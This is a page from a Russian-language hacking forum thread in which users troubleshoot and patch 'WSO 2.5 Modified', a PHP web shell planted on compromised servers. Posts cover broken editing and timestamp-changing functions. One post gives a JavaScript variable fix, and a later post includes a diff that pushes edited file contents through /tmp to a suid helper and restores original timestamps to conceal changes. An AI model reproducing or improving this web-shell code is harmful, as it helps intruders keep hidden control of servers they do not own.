HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Избранное
Перезагрузить страницу WSO 2.5 Modified
   
Ответ
Страница 10 из 11 « Первая < 6 7 8 9 10 11 >
 
Опции темы Поиск в этой теме Опции просмотра

  #91  
Старый 06.01.2013, 15:40
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию
Цитата:
Сообщение от Faaax  
Faaax said:
блеать не удержался сори,но напиши в сорцах по грамотному тогда,если это задевает(***ню начинаете писать)
Да ладно не расстраивайся
 
Ответить с цитированием

  #92  
Старый 06.01.2013, 15:43
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию
WSO 2.5 Modified багнутый какой-то... На пример пытаюсь изменить дату, жму ок - ниче не пишет и переходит в каталог с файлами, смотрю, а дата таже стоит...
 
Ответить с цитированием

  #93  
Старый 06.01.2013, 19:10
herfleisch
Участник форума
Регистрация: 07.01.2009
Сообщений: 237
Провел на форуме:
745649

Репутация: 97
Отправить сообщение для herfleisch с помощью ICQ
По умолчанию
Цитата:
Сообщение от Vip77  
Vip77 said:
WSO 2.5 Modified багнутый какой-то... На пример пытаюсь изменить дату, жму ок - ниче не пишет и переходит в каталог с файлами, смотрю, а дата таже стоит...
Права-то на запись имеются?
 
Ответить с цитированием

  #94  
Старый 06.01.2013, 19:18
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию
Цитата:
Сообщение от herfleisch  
herfleisch said:
Права-то на запись имеются?
Конечно, попробовал изменить дату с wso 2.4 все спокойно меняется

Если бы не было прав, то писало бы Fail! а так вообще ничего не пишет, а перекидывает в файловый менеджер и в адресной строке - shell.php?touch=2012-12-01 14:22:54

Изменить имя файла тоже не получается... просто прописывается в адресной строке

shell.php?name=измененноеимя.php

Пытаюсь изменить содержимое файла - не изменяется в адресной строке - shell.php?text=blablabla
 
Ответить с цитированием

  #95  
Старый 06.01.2013, 19:30
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию
Неужели только у меня такое...
 
Ответить с цитированием

  #96  
Старый 06.01.2013, 22:48
tmp
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
Провел на форуме:
936234

Репутация: 56
По умолчанию
Цитата:
Сообщение от Vip77  
Vip77 said:
Неужели только у меня такое...
А файлы редактировать можешь? Исправлял в исходнике яваскрипт? Там ошибка, в оригинальном файле.
 
Ответить с цитированием

  #97  
Старый 07.01.2013, 00:27
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию
Цитата:
Сообщение от tmp  
tmp said:
А файлы редактировать можешь? Исправлял в исходнике яваскрипт? Там ошибка, в оригинальном файле.
Файлы редактировать через этот шелл не могу. А права есть. И где там ошибка в яваскрипте не знаю... Как выложили так и юзал.
 
Ответить с цитированием

  #98  
Старый 07.01.2013, 00:36
tmp
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
Провел на форуме:
936234

Репутация: 56
По умолчанию
Строки 231 и 232

Код:
Code:
var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';    
 var p1_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
поменяй строку 232

на

Код:
Code:
var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
var p2_ должно быть

ЗЫ

Но проблему с редактированием файлов больше 20 кБ так и не решил
 
Ответить с цитированием

  #99  
Старый 07.01.2013, 01:12
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию
Цитата:
Сообщение от tmp  
tmp said:
Строки 231 и 232
Код:
Code:
var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';    
 var p1_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
поменяй строку 232
на
Код:
Code:
var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
var p2_
должно быть
ЗЫ
Но проблему с редактированием файлов больше 20 кБ так и не решил
О спасибо, этим решилось много проблем
 
Ответить с цитированием

  #100  
Старый 09.01.2013, 04:01
Jer1cho
Участник форума
Регистрация: 06.06.2008
Сообщений: 162
Провел на форуме:
3942177

Репутация: 244
Отправить сообщение для Jer1cho с помощью ICQ
По умолчанию
Цитата:
Сообщение от tmp  
tmp said:
А файлы редактировать можешь? Исправлял в исходнике яваскрипт? Там ошибка, в оригинальном файле.
Проблема в том, что к suid'нику передается сильно длинный параметр. И запрос выдает "Argument list too long".

Решение которое пришло первым в голову (на сколько стабильно работает не знаю):

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]
diff[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]git a[/COLOR][COLOR="#007700"]/var/[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]orig[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php b[/COLOR][COLOR="#007700"]/var/[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]mod[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php

index eb36bb8[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"].0aebf2c 100644

[/COLOR][COLOR="#007700"]---[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]/var/[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]orig[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php

[/COLOR][COLOR="#007700"]+++[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]/var/[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]mod[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php

[/COLOR][COLOR="#007700"]@@ -[/COLOR][COLOR="#0000BB"]104[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]104[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]@@ if([/COLOR][COLOR="#0000BB"]get_magic_quotes_gpc[/COLOR][COLOR="#007700"]()) {



if (!empty([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]'sname'[/COLOR][COLOR="#007700"]]) && !empty([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]'spass'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]'sname'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]&& ![/COLOR][COLOR="#0000BB"]defined[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'suid'[/COLOR][COLOR="#007700"])) {

+if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p2'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'edit'[/COLOR][COLOR="#007700"]&& !empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p3'[/COLOR][COLOR="#007700"]])){

+[/COLOR][COLOR="#0000BB"]$tmp_path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'/tmp/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]str_shuffle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'0123456789abcdefghijklmnopqrstuvwxyz'[/COLOR][COLOR="#007700"]);

+

+[/COLOR][COLOR="#0000BB"]file_put_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tmp_path[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p3'[/COLOR][COLOR="#007700"]]) or die([/COLOR][COLOR="#DD0000"]'/tmp/ isn\'t writable.'[/COLOR][COLOR="#007700"]);

+

+[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p3'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$tmp_path[/COLOR][COLOR="#007700"];

+}

echo[/COLOR][COLOR="#0000BB"]wsoEx[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]'sname'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]'spass'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]' "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]'sphp'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'SCRIPT_FILENAME'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]' \''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]addslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]])]).[/COLOR][COLOR="#DD0000"]'\' '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'\''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]base64_encode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]serialize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]'\'"'[/COLOR][COLOR="#007700"]);

@@ -[/COLOR][COLOR="#0000BB"]963[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]970[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"]@@ function[/COLOR][COLOR="#0000BB"]actionFilesTools[/COLOR][COLOR="#007700"]() {

 echo[/COLOR][COLOR="#DD0000"]'File isn\'t writeable'[/COLOR][COLOR="#007700"];

 break;

 }

+

 if( !empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p3'[/COLOR][COLOR="#007700"]]) ) {

[/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]filemtime[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p1'[/COLOR][COLOR="#007700"]]);

-[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p3'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p3'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p1'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"w"[/COLOR][COLOR="#007700"]);

 if([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"]) {

- @[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p3'[/COLOR][COLOR="#007700"]]);

+ @[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"](([/COLOR][COLOR="#0000BB"]defined[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'suid'[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p3'[/COLOR][COLOR="#007700"]]) :[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p3'[/COLOR][COLOR="#007700"]]),[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]));

 @[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"]);

+ if([/COLOR][COLOR="#0000BB"]defined[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'suid'[/COLOR][COLOR="#007700"])) @[/COLOR][COLOR="#0000BB"]unlink[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p3'[/COLOR][COLOR="#007700"]]);

 echo[/COLOR][COLOR="#DD0000"]'Saved!
p3_="";'[/COLOR][COLOR="#007700"];

 @[/COLOR][COLOR="#0000BB"]touch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p1'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#007700"]);

 }

[/COLOR][/COLOR
https://gist.github.com/c52be259912a3123b2f1

Естественно нужны права на запись в /tmp/, можно было и иначе, просто переносить из /tmp/ используя mv, но делать лень.

Еще как вариант можно разделять запросы на части, но это будет сильно затратно в плане выделения памяти.
 
Ответить с цитированием
Ответ
Страница 10 из 11 « Первая < 6 7 8 9 10 11 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ